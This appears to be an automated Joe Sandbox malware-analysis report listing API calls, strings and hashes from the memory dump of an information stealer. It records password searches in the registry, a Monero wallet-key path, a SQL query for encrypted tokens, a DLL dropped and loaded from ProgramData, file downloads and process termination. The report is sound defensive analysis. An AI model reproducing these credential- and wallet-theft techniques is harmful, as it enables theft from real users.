                                    • Instruction ID: de379d6c72ca89217335e1a0d40331fabeecc66310228721602c5779008788cf
                                    • Opcode Fuzzy Hash: 394dfed9440d265cd28867b9dee709673559f1db13a9843842b1ae40222b2526
                                    • Instruction Fuzzy Hash: 7C41FA75A10258EBCB14EBA5CC95BEDB7F4EB48740F104196F549A7290DBB0AE84CB50
                                    APIs
                                      • Part of subcall function 00BD7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BD739A
                                      • Part of subcall function 00BD7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BD7411
                                      • Part of subcall function 00BD7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BD746D
                                      • Part of subcall function 00BD7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00BD74B2
                                      • Part of subcall function 00BD7330: HeapFree.KERNEL32(00000000), ref: 00BD74B9
                                    • lstrcat.KERNEL32(00000000,00BF192C), ref: 00BD7666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD76A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00BD76BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD76EF
                                    • lstrcat.KERNEL32(00000000,00BF1934), ref: 00BD7700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD7733
                                    • lstrcat.KERNEL32(00000000,00BF1938), ref: 00BD774D
                                    • task.LIBCPMTD ref: 00BD775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: bec6b7d2a11a3487a899e1badefffa77383ecbbc4ea35d569b41efc1f5fdd5fb
                                    • Instruction ID: 4b8ace5b4b6b8fa229debdccd90bff6cfb00b1d1c3ca027a6a8b3852c4d5d94d
                                    • Opcode Fuzzy Hash: bec6b7d2a11a3487a899e1badefffa77383ecbbc4ea35d569b41efc1f5fdd5fb
                                    • Instruction Fuzzy Hash: 94313EB1A08109DFDB04DBA5DC959FFB7B9AB49301B504599F102733A0EB74A94ECBA0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,018BDD40,00000000,?,00BF0E14,00000000,?,00000000), ref: 00BE82C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE82C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BE82E8
                                    • __aulldiv.LIBCMT ref: 00BE8302
                                    • __aulldiv.LIBCMT ref: 00BE8310
                                    • wsprintfA.USER32 ref: 00BE833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: d5abb25285c84a331b7b1b401aa3cc4ee7846ff14bb7fc5309695a1c862d3a91
                                    • Instruction ID: db406bc6e177e92639637b70d7e49b28530cc05ddf5156b23cacdf46306036d9
                                    • Opcode Fuzzy Hash: d5abb25285c84a331b7b1b401aa3cc4ee7846ff14bb7fc5309695a1c862d3a91
                                    • Instruction Fuzzy Hash: DC215EB1E44248AFDB00DFD5CC49FAEB7B8FB48B00F104559F209BB280D77869048BA4
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                    • InternetOpenA.WININET(00BF0DFB,00000001,00000000,00000000,00000000), ref: 00BD615F
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BD61DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BD6203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00BD622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00BD6299
                                    • InternetCloseHandle.WININET(?), ref: 00BD62A3
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD62B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 0d335d175f6da0814746645ecb06b066dddd23b3ea7ae5313e904313b628f92f
                                    • Instruction ID: 26f009d8211d477df31b075801471849e8132ae77535e6355936faba8387f3b2
                                    • Opcode Fuzzy Hash: 0d335d175f6da0814746645ecb06b066dddd23b3ea7ae5313e904313b628f92f
                                    • Instruction Fuzzy Hash: 5D5143B1A00218AFDB24DFA1CC45BDEB7B9AB44301F1080D9F645B71C1EB75AA89CF95
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 00C5024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 00C5035B
                                    • CatchIt.LIBVCRUNTIME ref: 00C503AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 00C504C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: ec614265e84960c72dfd0c682527563c81f2bf1a96d0257669c795d55978b7c3
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: D4B1A179C00209DFCF15DFA4C8819AEB7B5FF14312F24415AED21AB212D730DA99DB99
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BD739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BD7411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BD746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD74B2
                                    • HeapFree.KERNEL32(00000000), ref: 00BD74B9
                                    • task.LIBCPMTD ref: 00BD75B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 717eb82f0112196da2a99d5fa5af77d1a0dae9bfe4e1a4a85609a917c2ff8ba8
                                    • Instruction ID: 5f81f8432b423a1ab5b36e8b7140daed7a4faacab33349f240aff415443ec583
                                    • Opcode Fuzzy Hash: 717eb82f0112196da2a99d5fa5af77d1a0dae9bfe4e1a4a85609a917c2ff8ba8
                                    • Instruction Fuzzy Hash: 87612AB59441689BDB24DB50DC41BD9B7F8FF58304F0081EAE649A6241EFB06BC9CFA1
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBC6F
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BDBC9D
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBD75
                                    • lstrlen.KERNEL32(00000000), ref: 00BDBD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: b878acd6eeab739a34e00d0bdc191c08182a8b38333bedd8282439b9feffd976
                                    • Instruction ID: 6df394c6bd0e01ab0e4d197b98beb955f639b2e51ca7d3c6b753d27dfa1daa7c
                                    • Opcode Fuzzy Hash: b878acd6eeab739a34e00d0bdc191c08182a8b38333bedd8282439b9feffd976
                                    • Instruction Fuzzy Hash: 2EB14C72910148ABCB14FBB1CDA6EEE77BDAF54300F4145E9F106621A1EF347A48CB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: fba26a4e9d83e448e8bb0501abee537dced8246751933ea4d0fe2fe752f086a0
                                    • Instruction ID: b12fa545835337600d89c30d5a6d016b6c7266d07f4965580c75d468c7698a72
                                    • Opcode Fuzzy Hash: fba26a4e9d83e448e8bb0501abee537dced8246751933ea4d0fe2fe752f086a0
                                    • Instruction Fuzzy Hash: 09F08231E0D249EFD344DFE2EC0975CBBF0EB1A747F1141A6F649A6190CA706A50DB61
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00BE08DC,C:\ProgramData\chrome.dll), ref: 00BE9871
                                      • Part of subcall function 00BDA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BDA098
                                    • StrCmpCA.SHLWAPI(00000000,018B8F00), ref: 00BE0922
                                    • StrCmpCA.SHLWAPI(00000000,018B9010), ref: 00BE0B79
                                    • StrCmpCA.SHLWAPI(00000000,018B8F10), ref: 00BE0A0C
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BE0C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00BE08CD
                                    • C:\ProgramData\chrome.dll, xrefs: 00BE0C30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 73608517b0c5f913d1fd2194b725c1572f9dc0a32409a0aa5eaa40c4cccf41ee
                                    • Instruction ID: 772c87c50709f00ee3a903c720dea2aa13a06660230c46360aca68557f40100f
                                    • Opcode Fuzzy Hash: 73608517b0c5f913d1fd2194b725c1572f9dc0a32409a0aa5eaa40c4cccf41ee
                                    • Instruction Fuzzy Hash: 60A179717002489FCB28FF65D991AAD77FAEF95300F11856DE40A5F391DB30AA09CB92
                                    APIs
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                    • wsprintfA.USER32 ref: 00BD9E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BD9F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BD9F17
                                    • lstrcat.KERNEL32(00000000,00BF12D8), ref: 00BD9F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00BD9F7C
                                    • Sleep.KERNEL32(00001388), ref: 00BDA013
                                      • Part of subcall function 00BE99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE99C5
                                      • Part of subcall function 00BE99A0: Process32First.KERNEL32(00BDA056,00000128), ref: 00BE99D9
                                      • Part of subcall function 00BE99A0: Process32Next.KERNEL32(00BDA056,00000128), ref: 00BE99F2
                                      • Part of subcall function 00BE99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE9A4E
                                      • Part of subcall function 00BE99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE9A6C
                                      • Part of subcall function 00BE99A0: CloseHandle.KERNEL32(00000000), ref: 00BE9A79
                                      • Part of subcall function 00BE99A0: CloseHandle.KERNEL32(00BDA056), ref: 00BE9A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: ea9c58d87a68d18a4afe97c04287e9ab82652e6ccf701b17c961b5a27fdac4b1
                                    • Instruction ID: 7d3b467e7ae5a48a895fd1ec9155a1f691810803a438e145e483a5cc63b84e80
                                    • Opcode Fuzzy Hash: ea9c58d87a68d18a4afe97c04287e9ab82652e6ccf701b17c961b5a27fdac4b1
                                    • Instruction Fuzzy Hash: D65176B1944318ABEB24DB60DC4AFDE77B8AF44704F0045D8B60DA7291EB75AB88CF51
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00C4FA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C4FA27
